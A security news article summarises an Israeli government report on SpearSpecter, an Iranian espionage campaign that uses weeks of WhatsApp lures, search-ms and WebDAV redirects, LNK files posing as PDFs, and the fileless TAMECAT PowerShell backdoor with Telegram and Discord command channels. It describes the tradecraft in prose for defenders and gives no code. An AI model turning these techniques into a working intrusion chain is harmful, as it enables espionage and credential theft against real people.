Iran APT SpearSpecter Uses Weeks-Long WhatsApp Lures and Fileless TAMECAT Backdoor to Hit Defense

Researchers from the Israel National Digital Agency (INDA) have revealed a highly sophisticated, ongoing cyber-espionage operation they call SpearSpecter, linked to Iranian state-aligned threat actors working on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO). The campaign leverages weeks-long social engineering, multi-channel command-and-control (C2) frameworks, and the fileless TAMECAT PowerShell backdoor to infiltrate high-value government and defense targets.

Unlike common phishing operations, SpearSpecter relies on slow, carefully cultivated engagement with targeted individuals. Operators impersonate scholars, diplomats, conference organizers, or senior officials and spend days or weeks messaging the target—often through WhatsApp—to build legitimacy before introducing malicious elements.

As the report explains:

“SpearSpecter elevates spear-phishing by devoting weeks to building personalized relationships with high-value targets… They sustain multi-day conversations to build credibility.”

Targets include senior figures in defense ministries, intelligence sectors, and high-level government offices, as well as their family members—a tactic designed to widen the attack surface and apply pressure.

TAMECAT PowerShell, WebDAV Protocol Abuse — AMECAT’s In-Memory Loader Chain | Image: Israel National Digital Agency

Once trust is established, victims receive malicious links disguised as conference documents or briefing materials hosted on OneDrive. Clicking the link triggers several hidden redirects that abuse the Windows search-ms URI protocol, prompting users to open Windows Explorer.

The report notes:

“One redirect leads to a crafted web page that abuses the Windows search-ms URI protocol handler… Explorer connects to the attacker’s WebDAV server.”

From that WebDAV share, the victim is shown a malicious LNK file disguised as a PDF. When opened, the LNK silently executes a command that downloads a batch script from Cloudflare Workers, initiating the infection chain.

After the initial compromise, the malware deploys TAMECAT, a modular PowerShell-based backdoor previously observed in APT42-related operations.

INDA describes it as:

“a sophisticated PowerShell-based backdoor known as TAMECAT… with modular components designed to facilitate data exfiltration and remote control.”

Key TAMECAT capabilities include:

In-memory execution with minimal disk artifacts
Dynamic module loading via Cloudflare Workers
Multi-channel C2: HTTPS, Discord, and Telegram
Credential harvesting (browsers, VPNs, crypto wallets)
Data exfiltration using AES-encrypted channels
Screenshot capture (50 images per session)
Outlook OST mailbox theft
Targeted file crawling across sensitive document types

INDA emphasizes the novelty of the C2 design:

“The SpearSpecter campaign was the first recorded instance of APT42 using Telegram and Discord as C2.”

The Telegram-based command handler even treats any unknown incoming message as executable PowerShell, allowing operators to run code on the target system with a single chat message.

Throughout the operation, SpearSpecter relies heavily on legitimate cloud infrastructure, including Cloudflare Workers, Discord, Telegram, Firebase, and Somee WebDAV hosting.

INDA notes:

“TAMECAT leverages Cloudflare Workers… Traffic to Cloudflare blends seamlessly with normal web browsing and is widely permitted.”

This ensures both resiliency and low detectability, making the malware’s network traffic difficult for defenders to block without risking service disruption.

TAMECAT’s data harvesting is highly selective, focusing on high-value files such as:

Office documents
PDFs and spreadsheets
Password databases
Media files
Browser profiles
Outlook mailboxes

It avoids noisy or irrelevant directories to minimize detection.

A unique component, Runs.dll, enables chunked uploads:

“Reads a byte-range from a file and returns that slice… so the file can be streamed piece by piece without loading the file into memory.”

This allows large archives or mailbox files to exfiltrate quietly over encrypted HTTPS, Telegram, or FTP channels.

SpearSpecter uses redundant persistence techniques, including:

A Run key named Renovation to execute hidden batch files
A UserInitMprLogonScript entry invoking conhost-hosted PowerShell beacons
Storing victim identifiers in the registry rather than on disk
Obfuscated, randomly named files (e.g., fhgPczTORoCNEDsm.txt)

The report states:

“TAMECAT operates as a modular in-memory loader that uses trusted system binaries… to minimize on-disk traces.”

INDA assesses with high confidence that the campaign is operated by IRGC-IO-aligned groups, including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress.

According to the researchers:

“Our investigation identified tools, infrastructure components, and operational patterns… strongly aligned with activity historically attributed to Iranian state-aligned actors within the IRGC’s cyber apparatus.”

These include:

APT42-style WhatsApp social engineering
LNK-based initial access, with runtime-repaired commands
Use of TAMECAT and NICECURL-like loaders
Cloud-hosted fake meeting invitations
Multi-cluster infrastructure strategy

The operators also target senior defense and government officials, consistent with IRGC intelligence objectives.

SpearSpecter represents a significant escalation in Iranian cyber-espionage tradecraft. With its focus on relationship-based social engineering, fileless modular malware, and multi-channel, cloud-based C2, the campaign demonstrates persistence, discipline, and a deep understanding of both human behavior and Windows internals.

As the report summarizes:

“The strategic focus on senior leadership, combined with these tailored delivery methods and custom tooling, exemplifies the patient, intelligence-first operations characteristic of state-sponsored APT groups.”

Rate this post

Related Posts:

Found this helpful?

Leave a Reply Cancel reply